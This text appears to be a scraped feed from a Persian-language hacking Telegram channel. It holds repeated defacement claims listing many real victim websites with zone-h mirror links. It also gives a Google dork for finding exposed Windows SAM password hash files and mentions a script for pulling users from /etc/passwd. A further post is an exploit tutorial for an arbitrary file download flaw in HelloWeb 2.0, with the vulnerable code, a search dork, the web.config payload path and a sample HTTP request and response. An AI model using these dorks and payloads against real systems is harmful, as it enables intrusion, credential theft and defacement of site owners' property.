#DeFaced By #X0P4SH4
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://zone-h.org/mirror/id/31640656
http://magento.eterrasystems.eu/
—
@LearnExploit
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://zone-h.org/mirror/id/31640656
http://magento.eterrasystems.eu/
—
@LearnExploit
#DeFaced By #X0P4SH4
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://zone-h.org/mirror/id/31640658
http://prestashop.eterrasystems.eu/
—
@LearnExploit
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://zone-h.org/mirror/id/31640658
http://prestashop.eterrasystems.eu/
—
@LearnExploit
#Hacked By #X0P4SH4
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://zone-h.org/mirror/id/31640696
http://www.dentalsupply.co.cr/
—
@LearnExploit
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://zone-h.org/mirror/id/31640696
http://www.dentalsupply.co.cr/
—
@LearnExploit
#Hacked By #X0P4SH4
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://mirror-h.org/zone/1699092/
http://twawezacommunications.org/home.php
—
@LearnExploit
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://mirror-h.org/zone/1699092/
http://twawezacommunications.org/home.php
—
@LearnExploit
#Hacked By #X0P4SH4
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://zone-h.org/mirror/id/31641341
http://fcrsny.org/index.html
—
@LearnExploit
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://zone-h.org/mirror/id/31641341
http://fcrsny.org/index.html
—
@LearnExploit
Forwarded from 0Day.Today | Learn Exploit | Zero World | Dark web |
اموزش بدست اوردن
userName & password
سیستم ویندوز از طریق سایت 😄
------
#Find #SAM file with a #Dork (#GHDB) #OS_Windows
------
شاید اول از هر چیزی بپرسید که SAM چیه ؟
دوستان SAM با همون
Security Account Manager
است که user and pass ویندوز رو درون خودش نگهداری میکنه !
فایل SAM ساختار ساده ای داره و از دو نوع الگوریتم Hashing به نام های LM (یه یک الگریتم ضعیف بوده) و NTLM (که یک الگریتم جدید و بهبود یافته است) .
شما میتونید فایل SAM ویندوز خودتون رو از مسیر زیر بدست بیارید :
%SystemRoot%/system32/config/SAM
(در مورد Dump این فاید بعدا صحبت میکنیم).
_
حالا روش بدست اوردن این فایل از طریق وب :
Dork : filetype:txt Administrator:500:
و تمام :)
نمونه :
https://www.albany.edu/~goel/classes/spring2010/itm604/pwfile.txt
=====================
#X0P4SH4
T.me/LearnExploit
0Day.Today
userName & password
سیستم ویندوز از طریق سایت 😄
------
#Find #SAM file with a #Dork (#GHDB) #OS_Windows
------
شاید اول از هر چیزی بپرسید که SAM چیه ؟
دوستان SAM با همون
Security Account Manager
است که user and pass ویندوز رو درون خودش نگهداری میکنه !
فایل SAM ساختار ساده ای داره و از دو نوع الگوریتم Hashing به نام های LM (یه یک الگریتم ضعیف بوده) و NTLM (که یک الگریتم جدید و بهبود یافته است) .
شما میتونید فایل SAM ویندوز خودتون رو از مسیر زیر بدست بیارید :
%SystemRoot%/system32/config/SAM
(در مورد Dump این فاید بعدا صحبت میکنیم).
_
حالا روش بدست اوردن این فایل از طریق وب :
Dork : filetype:txt Administrator:500:
و تمام :)
نمونه :
https://www.albany.edu/~goel/classes/spring2010/itm604/pwfile.txt
=====================
#X0P4SH4
T.me/LearnExploit
0Day.Today
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
👍1
Forwarded from 0Day.Today | Learn Exploit | Zero World | Dark web |
extract users etcpassword.py
692 B
اسکریپت اسخراج یوزر های موجود در دایرکتوری
/etc/password/
#Script #python (py) #linux (OS)
@learnExploit ~ #X0P4SH4
/etc/password/
#Script #python (py) #linux (OS)
@learnExploit ~ #X0P4SH4
#Hacked By #X0P4SH4
[+] X0P4SH4 - iliyahr - R4DIKALL - UZIHACKER - EVILBOY [+]
https://mirror-h.org/zone/2652844/
https://casapulita.de/
——————
@LearnExploit
[+] X0P4SH4 - iliyahr - R4DIKALL - UZIHACKER - EVILBOY [+]
https://mirror-h.org/zone/2652844/
https://casapulita.de/
——————
@LearnExploit
#Hacked By #X0P4SH4
[+] X0P4SH4 - iliyahr - R4DIKALL - UZIHACKER - EVILBOY [+]
https://mirror-h.org/zone/2652978/
http://amazh.com/
——————
@LearnExploit
[+] X0P4SH4 - iliyahr - R4DIKALL - UZIHACKER - EVILBOY [+]
https://mirror-h.org/zone/2652978/
http://amazh.com/
——————
@LearnExploit
#Hacked By #X0P4SH4
[+] X0P4SH4 - iliyahr - SQLHunter - UZIHACKER - EVILBOY [+]
https://mirror-h.org/zone/2653676/
https://drfadaei.50m.ir/
——————
@LearnExploit
[+] X0P4SH4 - iliyahr - SQLHunter - UZIHACKER - EVILBOY [+]
https://mirror-h.org/zone/2653676/
https://drfadaei.50m.ir/
——————
@LearnExploit
#Hacked By #X0P4SH4
[+] X0P4SH4 - iliyahr - R4DiKaLL - UZIHACKER - EVILBOY [+]
https://mirror-h.org/zone/2658235/
https://wp.aryanweb.com/
——————
@LearnExploit
[+] X0P4SH4 - iliyahr - R4DiKaLL - UZIHACKER - EVILBOY [+]
https://mirror-h.org/zone/2658235/
https://wp.aryanweb.com/
——————
@LearnExploit
#Exploit #WebApp #HelloWeb #Arbitrary #File #Download #vulnerabilities
#اسیب_پذیری #برنامه_تحت_وب #بارگیری #فایل #دلخواه
➖➖➖➖➖➖➖➖➖
با سلام خدمت دوستان عزیز
در این قسمت اسیب پذیری یافت شده در برنامه ی تحت وب به نام HelloWeb را مورد بررسی قرار دهیم.
ابتدا توضیح مختصری در مورد باگ Arbitrary File Download بدیم :
به زبان ساده اگر توضیح بدم نوع دیگری از باگ ها LFI/RFI میباشد.
با این تفاوت که شما در این باگ قابلیت Travel Dir روندارین! یعنی نمیتونید بین مسیرهای موجود گشت و گذار کنید و فقط میتونید فایل یا فایل های مد نظر رو دانلود کنید.(البته بعضی از پارامتر های موجود این قابلیت رو داره).
اگه هنوز با باگ های LFI و RFI اشنا نیستید روی لینک های زیر کلیک کنید.
Link
➖➖➖➖➖➖➖➖➖➖➖
#Exploit-Title : ( HelloWeb 2.0 - Arbitrary File Download )
#Dork : ( Inurl:exec/file/download.asp )
#vulnerable-Code :
➖➖
filepath = Request.QueryString("filepath")
filename = Request.QueryString("filename")
filepath = Replace(filepath,"/","\")
➖➖
root_path = server.MapPath("/")
Set fso = CreateObject("Scripting.FileSystemObject")
Set root_folder = fso.GetFolder(root_path)
attachfile = root_path & filepath & "\" & filename
➖➖
Response.Clear
Response.ContentType = "application/unknown"
Response.AddHeader "Pragma", "no-cache"
Response.AddHeader "Expires", "0"
Response.AddHeader "Content-Transfer-Encoding", "binary"
Response.AddHeader "Content-Disposition","attachment; filename = " & Server.URLPathEncode(filename)
➖➖
Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Open
➖➖
objStream.Type = 1
objStream.LoadFromFile attachfile
➖➖
Response.BinaryWrite objStream.Read
Response.Flush
➖➖➖➖➖
طبق کد های مد نظر! این کد ها دسترسی دانلود فایل روبرای ما میده.
پارامتر هایی که اسیبپذیر هستند :
filtepath - filename - root_path - fso - root_folder - attachfile - objStream - strFile
چطوری میتوان از پارامترهای اسیب پذیر استفاده کرد :
به مثال زیر دقت کنید :
https://Target/download.asp?filepath=/&filename=hello.pdf
در این URL ما میفهمیم که فایل Download.asp اجازه ی دانلود فایل از مسیر / ( مسیر فعلی که ما هستیم)و فایل hello.pdf رو داده ...
➖➖➖➖➖➖➖➖➖
نحوه ی اکسپلویت این باگ :
#Exploit :
ابتدا با استفاده از دورک سایت اسیب پذیر رو پیدا کنید.
سپس
exec/file/download.asp?filepath=/&filename=web.config
روبه اخر هدفتون اضافه کنید.
البته این یک نمونه هست !
شما میتونید فایل های بیشتری رو با پارامتر متفاوت تست کنید.
➖➖➖➖➖➖➖➖
#PoC
تست :
این تست روی لوکال هاست صورت گرفته.
GET /exec/file/download.asp?filepath=/&filename=web.config HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
➖➖➖➖➖➖➖➖➖
RESPONSE: (پاسخ)
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/unknown; Charset=utf-8
Expires: 0,Thu, 09 Jul 2020 10:51:14 GMT
Server:
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename = web.config
Set-Cookie: ASPSESSIONIDQQCBDRBB=BEMDPMDDKFHNFKFMJGHIKKKI; path=/
Access-Control-Allow-Origin: *
x-xss-protection: 1; mode=block
Date: Thu, 09 Jul 2020 10:51:14 GMT
Connection: close
➖➖➖
نحوه ی Fix این باگ تو پست بعدی براتون شرح میدم.
امیدوارم که با کارتون بیاد...
هرگونه سوالی داشتید میتونید توی گروه بپرسید.
#X0P4SH4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Guy's
@LearnExploit
@Tech_Army
#اسیب_پذیری #برنامه_تحت_وب #بارگیری #فایل #دلخواه
➖➖➖➖➖➖➖➖➖
با سلام خدمت دوستان عزیز
در این قسمت اسیب پذیری یافت شده در برنامه ی تحت وب به نام HelloWeb را مورد بررسی قرار دهیم.
ابتدا توضیح مختصری در مورد باگ Arbitrary File Download بدیم :
به زبان ساده اگر توضیح بدم نوع دیگری از باگ ها LFI/RFI میباشد.
با این تفاوت که شما در این باگ قابلیت Travel Dir روندارین! یعنی نمیتونید بین مسیرهای موجود گشت و گذار کنید و فقط میتونید فایل یا فایل های مد نظر رو دانلود کنید.(البته بعضی از پارامتر های موجود این قابلیت رو داره).
اگه هنوز با باگ های LFI و RFI اشنا نیستید روی لینک های زیر کلیک کنید.
Link
➖➖➖➖➖➖➖➖➖➖➖
#Exploit-Title : ( HelloWeb 2.0 - Arbitrary File Download )
#Dork : ( Inurl:exec/file/download.asp )
#vulnerable-Code :
➖➖
filepath = Request.QueryString("filepath")
filename = Request.QueryString("filename")
filepath = Replace(filepath,"/","\")
➖➖
root_path = server.MapPath("/")
Set fso = CreateObject("Scripting.FileSystemObject")
Set root_folder = fso.GetFolder(root_path)
attachfile = root_path & filepath & "\" & filename
➖➖
Response.Clear
Response.ContentType = "application/unknown"
Response.AddHeader "Pragma", "no-cache"
Response.AddHeader "Expires", "0"
Response.AddHeader "Content-Transfer-Encoding", "binary"
Response.AddHeader "Content-Disposition","attachment; filename = " & Server.URLPathEncode(filename)
➖➖
Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Open
➖➖
objStream.Type = 1
objStream.LoadFromFile attachfile
➖➖
Response.BinaryWrite objStream.Read
Response.Flush
➖➖➖➖➖
طبق کد های مد نظر! این کد ها دسترسی دانلود فایل روبرای ما میده.
پارامتر هایی که اسیبپذیر هستند :
filtepath - filename - root_path - fso - root_folder - attachfile - objStream - strFile
چطوری میتوان از پارامترهای اسیب پذیر استفاده کرد :
به مثال زیر دقت کنید :
https://Target/download.asp?filepath=/&filename=hello.pdf
در این URL ما میفهمیم که فایل Download.asp اجازه ی دانلود فایل از مسیر / ( مسیر فعلی که ما هستیم)و فایل hello.pdf رو داده ...
➖➖➖➖➖➖➖➖➖
نحوه ی اکسپلویت این باگ :
#Exploit :
ابتدا با استفاده از دورک سایت اسیب پذیر رو پیدا کنید.
سپس
exec/file/download.asp?filepath=/&filename=web.config
روبه اخر هدفتون اضافه کنید.
البته این یک نمونه هست !
شما میتونید فایل های بیشتری رو با پارامتر متفاوت تست کنید.
➖➖➖➖➖➖➖➖
#PoC
تست :
این تست روی لوکال هاست صورت گرفته.
GET /exec/file/download.asp?filepath=/&filename=web.config HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
➖➖➖➖➖➖➖➖➖
RESPONSE: (پاسخ)
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/unknown; Charset=utf-8
Expires: 0,Thu, 09 Jul 2020 10:51:14 GMT
Server:
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename = web.config
Set-Cookie: ASPSESSIONIDQQCBDRBB=BEMDPMDDKFHNFKFMJGHIKKKI; path=/
Access-Control-Allow-Origin: *
x-xss-protection: 1; mode=block
Date: Thu, 09 Jul 2020 10:51:14 GMT
Connection: close
➖➖➖
نحوه ی Fix این باگ تو پست بعدی براتون شرح میدم.
امیدوارم که با کارتون بیاد...
هرگونه سوالی داشتید میتونید توی گروه بپرسید.
#X0P4SH4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Guy's
@LearnExploit
@Tech_Army
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
——————
0Day.Today
@LearnExploit
@Tech_Army
#Hacked By #X0P4SH4
[+] X0P4SH4 - iliyahr - R4DiKaLL - UZIHACKER - EVILBOY - AT7 [+]
https://www.zone-h.org/mirror/id/38946463
https://www.bahraami.com/
——————
0Day.Today
@LearnExploit
@Tech_Army
[+] X0P4SH4 - iliyahr - R4DiKaLL - UZIHACKER - EVILBOY - AT7 [+]
https://www.zone-h.org/mirror/id/38946463
https://www.bahraami.com/
——————
0Day.Today
@LearnExploit
@Tech_Army
#Hacked By #X0P4SH4
[+] X0P4SH4 - iliyahr - R4DIKALL - AT7 - EVIL_BOY - Milad Hacking - MMD B4YPASS - S1R4M1R [+]
site : turkmal.ir
zone-h : http://www.zone-h.org/mirror/id/38954850
==============
0Day.Today
@LearnExploit
@Tech_Army
[+] X0P4SH4 - iliyahr - R4DIKALL - AT7 - EVIL_BOY - Milad Hacking - MMD B4YPASS - S1R4M1R [+]
site : turkmal.ir
zone-h : http://www.zone-h.org/mirror/id/38954850
==============
0Day.Today
@LearnExploit
@Tech_Army
#Hacked By #X0P4SH4
[+] X0P4SH4 - iliyahr - R4DIKALL - AT7 - EVIL_BOY - Milad Hacking - MMD B4YPASS - S1R4M1R [+]
=============
site : ytn-pj.com
zone-h : http://www.zone-h.org/mirror/id/38955146
➖➖➖➖➖➖➖➖
site : y-wtf.com
zone-h : http://www.zone-h.org/mirror/id/38955145
➖➖➖➖➖➖➖➖
site : yakiniku-todoroki.jp
zone-h : http://www.zone-h.org/mirror/id/38955144
➖➖➖➖➖➖➖➖
site : takusagawa-ya.com
zone-h : http://www.zone-h.org/mirror/id/38955143
➖➖➖➖➖➖➖➖
site : houmonsakura.com
zone-h : http://www.zone-h.org/mirror/id/38955142
➖➖➖➖➖➖➖➖
site : nishino-seikotsuin.com
zone-h : http://www.zone-h.org/mirror/id/38955141
➖➖➖➖➖➖➖➖
site : minami-alps-klein.jp
zone-h : http://www.zone-h.org/mirror/id/38955140
➖➖➖➖➖➖➖➖
site : kushigatayama.com
zone-h : http://www.zone-h.org/mirror/id/38955138
➖➖➖➖➖➖➖➖
site : kofu-aoba.com
zone-h : http://www.zone-h.org/mirror/id/38955137
➖➖➖➖➖➖➖➖
site : kiseki-kokoro.com
zone-h : http://www.zone-h.org/mirror/id/38955119
==============
0Day.Today
@LearnExploit
@Tech_Army
[+] X0P4SH4 - iliyahr - R4DIKALL - AT7 - EVIL_BOY - Milad Hacking - MMD B4YPASS - S1R4M1R [+]
=============
site : ytn-pj.com
zone-h : http://www.zone-h.org/mirror/id/38955146
➖➖➖➖➖➖➖➖
site : y-wtf.com
zone-h : http://www.zone-h.org/mirror/id/38955145
➖➖➖➖➖➖➖➖
site : yakiniku-todoroki.jp
zone-h : http://www.zone-h.org/mirror/id/38955144
➖➖➖➖➖➖➖➖
site : takusagawa-ya.com
zone-h : http://www.zone-h.org/mirror/id/38955143
➖➖➖➖➖➖➖➖
site : houmonsakura.com
zone-h : http://www.zone-h.org/mirror/id/38955142
➖➖➖➖➖➖➖➖
site : nishino-seikotsuin.com
zone-h : http://www.zone-h.org/mirror/id/38955141
➖➖➖➖➖➖➖➖
site : minami-alps-klein.jp
zone-h : http://www.zone-h.org/mirror/id/38955140
➖➖➖➖➖➖➖➖
site : kushigatayama.com
zone-h : http://www.zone-h.org/mirror/id/38955138
➖➖➖➖➖➖➖➖
site : kofu-aoba.com
zone-h : http://www.zone-h.org/mirror/id/38955137
➖➖➖➖➖➖➖➖
site : kiseki-kokoro.com
zone-h : http://www.zone-h.org/mirror/id/38955119
==============
0Day.Today
@LearnExploit
@Tech_Army
#Hacked By #X0P4SH4
[+] X0P4SH4 - iliyahr - R4DIKALL - AT7 - EVIL_BOY - Milad Hacking - MMD B4YPASS - S1R4M1R [+]
➖➖➖➖➖➖➖➖
site : korirug.com
zone-h : http://www.zone-h.org/mirror/id/38955117
➖➖➖➖➖➖➖➖
site : gunnai.com
zone-h : http://www.zone-h.org/mirror/id/38955110
➖➖➖➖➖➖➖➖
site : haneru.net
zone-h : http://www.zone-h.org/mirror/id/38955109
➖➖➖➖➖➖➖➖
site : farm-kunugi.com
zone-h : http://www.zone-h.org/mirror/id/38955108
➖➖➖➖➖➖➖➖
site : clean-fighters.jp
zone-h : http://www.zone-h.org/mirror/id/38955107
➖➖➖➖➖➖➖➖
site : mamoribito.net
zone-h : http://www.zone-h.org/mirror/id/38955106
➖➖➖➖➖➖➖➖
site : aramorikatsu.com
zone-h : http://www.zone-h.org/mirror/id/38955105
➖➖➖➖➖➖➖➖
site : tower3710.net
zone-h : http://www.zone-h.org/mirror/id/38955104
➖➖➖➖➖➖➖➖
site : shibaurasanbashi-cruise.com
zone-h : http://www.zone-h.org/mirror/id/38955103
➖➖➖➖➖➖➖➖
site : kamopro.com
zone-h : http://www.zone-h.org/mirror/id/38955102
==============
0Day.Today
@LearnExploit
@Tech_Army
[+] X0P4SH4 - iliyahr - R4DIKALL - AT7 - EVIL_BOY - Milad Hacking - MMD B4YPASS - S1R4M1R [+]
➖➖➖➖➖➖➖➖
site : korirug.com
zone-h : http://www.zone-h.org/mirror/id/38955117
➖➖➖➖➖➖➖➖
site : gunnai.com
zone-h : http://www.zone-h.org/mirror/id/38955110
➖➖➖➖➖➖➖➖
site : haneru.net
zone-h : http://www.zone-h.org/mirror/id/38955109
➖➖➖➖➖➖➖➖
site : farm-kunugi.com
zone-h : http://www.zone-h.org/mirror/id/38955108
➖➖➖➖➖➖➖➖
site : clean-fighters.jp
zone-h : http://www.zone-h.org/mirror/id/38955107
➖➖➖➖➖➖➖➖
site : mamoribito.net
zone-h : http://www.zone-h.org/mirror/id/38955106
➖➖➖➖➖➖➖➖
site : aramorikatsu.com
zone-h : http://www.zone-h.org/mirror/id/38955105
➖➖➖➖➖➖➖➖
site : tower3710.net
zone-h : http://www.zone-h.org/mirror/id/38955104
➖➖➖➖➖➖➖➖
site : shibaurasanbashi-cruise.com
zone-h : http://www.zone-h.org/mirror/id/38955103
➖➖➖➖➖➖➖➖
site : kamopro.com
zone-h : http://www.zone-h.org/mirror/id/38955102
==============
0Day.Today
@LearnExploit
@Tech_Army
#Hacked By #X0P4SH4
[+] X0P4SH4 - iliyahr - R4DIKALL - AT7 - EVIL_BOY - Milad Hacking - MMD B4YPASS - S1R4M1R [+]
➖➖➖➖➖➖➖➖
site : air-claire.com
zone-h : http://www.zone-h.org/mirror/id/38955101
➖➖➖➖➖➖➖➖
site : j-enterprise.com
zone-h : http://www.zone-h.org/mirror/id/38955099
➖➖➖➖➖➖➖➖
site : kensyoin.net
zone-h : www.zone-h.org/mirror/id/38955118
==============
0Day.Today
@LearnExploit
@Tech_Army
[+] X0P4SH4 - iliyahr - R4DIKALL - AT7 - EVIL_BOY - Milad Hacking - MMD B4YPASS - S1R4M1R [+]
➖➖➖➖➖➖➖➖
site : air-claire.com
zone-h : http://www.zone-h.org/mirror/id/38955101
➖➖➖➖➖➖➖➖
site : j-enterprise.com
zone-h : http://www.zone-h.org/mirror/id/38955099
➖➖➖➖➖➖➖➖
site : kensyoin.net
zone-h : www.zone-h.org/mirror/id/38955118
==============
0Day.Today
@LearnExploit
@Tech_Army
#Hacked By #X0P4SH4
[+] X0P4SH4 - iliyahr - R4DIKALL - AT7 - EVIL_BOY - Milad Hacking - MMD B4YPASS - S1R4M1R [+]
➖➖➖➖➖➖➖➖
https://waybright.com
http://www.zone-h.org/mirror/id/38957165
https://course.waybright.com
http://www.zone-h.org/mirror/id/38957190
https://alex.student.waybright.com
http://www.zone-h.org/mirror/id/38957189
https://molly.student.waybright.com
http://www.zone-h.org/mirror/id/38957187
https://chento.students.waybright.com
http://www.zone-h.org/mirror/id/38957186
➖➖➖➖➖➖➖➖➖
0Day.Today
@LearnExploit
@Tech_Army
[+] X0P4SH4 - iliyahr - R4DIKALL - AT7 - EVIL_BOY - Milad Hacking - MMD B4YPASS - S1R4M1R [+]
➖➖➖➖➖➖➖➖
https://waybright.com
http://www.zone-h.org/mirror/id/38957165
https://course.waybright.com
http://www.zone-h.org/mirror/id/38957190
https://alex.student.waybright.com
http://www.zone-h.org/mirror/id/38957189
https://molly.student.waybright.com
http://www.zone-h.org/mirror/id/38957187
https://chento.students.waybright.com
http://www.zone-h.org/mirror/id/38957186
➖➖➖➖➖➖➖➖➖
0Day.Today
@LearnExploit
@Tech_Army
#Hacked By #X0P4SH4
[+] X0P4SH4 - iliyahr - R4DIKALL - AT7 - EVIL_BOY - Milad Hacking - MMD B4YPASS - S1R4M1R [+]
➖➖➖➖➖➖➖➖
https://alex.students.waybright.com
http://www.zone-h.org/mirror/id/38957185
https://molly.students.waybright.com
http://www.zone-h.org/mirror/id/38957184
https://fll.student.waybright.com
http://www.zone-h.org/mirror/id/38957183
https://thomas.students.waybright.com
http://www.zone-h.org/mirror/id/38957182
https://chento.student.waybright.com
http://www.zone-h.org/mirror/id/38957181
➖➖➖➖➖➖➖➖➖
0Day.Today
@LearnExploit
@Tech_Army
[+] X0P4SH4 - iliyahr - R4DIKALL - AT7 - EVIL_BOY - Milad Hacking - MMD B4YPASS - S1R4M1R [+]
➖➖➖➖➖➖➖➖
https://alex.students.waybright.com
http://www.zone-h.org/mirror/id/38957185
https://molly.students.waybright.com
http://www.zone-h.org/mirror/id/38957184
https://fll.student.waybright.com
http://www.zone-h.org/mirror/id/38957183
https://thomas.students.waybright.com
http://www.zone-h.org/mirror/id/38957182
https://chento.student.waybright.com
http://www.zone-h.org/mirror/id/38957181
➖➖➖➖➖➖➖➖➖
0Day.Today
@LearnExploit
@Tech_Army
#Hacked By #X0P4SH4
[+] X0P4SH4 - iliyahr - R4DIKALL - AT7 - EVIL_BOY - Milad Hacking - MMD B4YPASS - S1R4M1R [+]
➖➖➖➖➖➖➖➖
https://eva.students.waybright.com
http://www.zone-h.org/mirror/id/38957180
https://eva.student.waybright.com
http://www.zone-h.org/mirror/id/38957179
https://thomas.student.waybright.com
http://www.zone-h.org/mirror/id/38957177
https://fll.students.waybright.com
http://www.zone-h.org/mirror/id/38957176
https://capstone.waybright.com
http://www.zone-h.org/mirror/id/38957171
➖➖➖➖➖➖➖➖➖
0Day.Today
@LearnExploit
@Tech_Army
[+] X0P4SH4 - iliyahr - R4DIKALL - AT7 - EVIL_BOY - Milad Hacking - MMD B4YPASS - S1R4M1R [+]
➖➖➖➖➖➖➖➖
https://eva.students.waybright.com
http://www.zone-h.org/mirror/id/38957180
https://eva.student.waybright.com
http://www.zone-h.org/mirror/id/38957179
https://thomas.student.waybright.com
http://www.zone-h.org/mirror/id/38957177
https://fll.students.waybright.com
http://www.zone-h.org/mirror/id/38957176
https://capstone.waybright.com
http://www.zone-h.org/mirror/id/38957171
➖➖➖➖➖➖➖➖➖
0Day.Today
@LearnExploit
@Tech_Army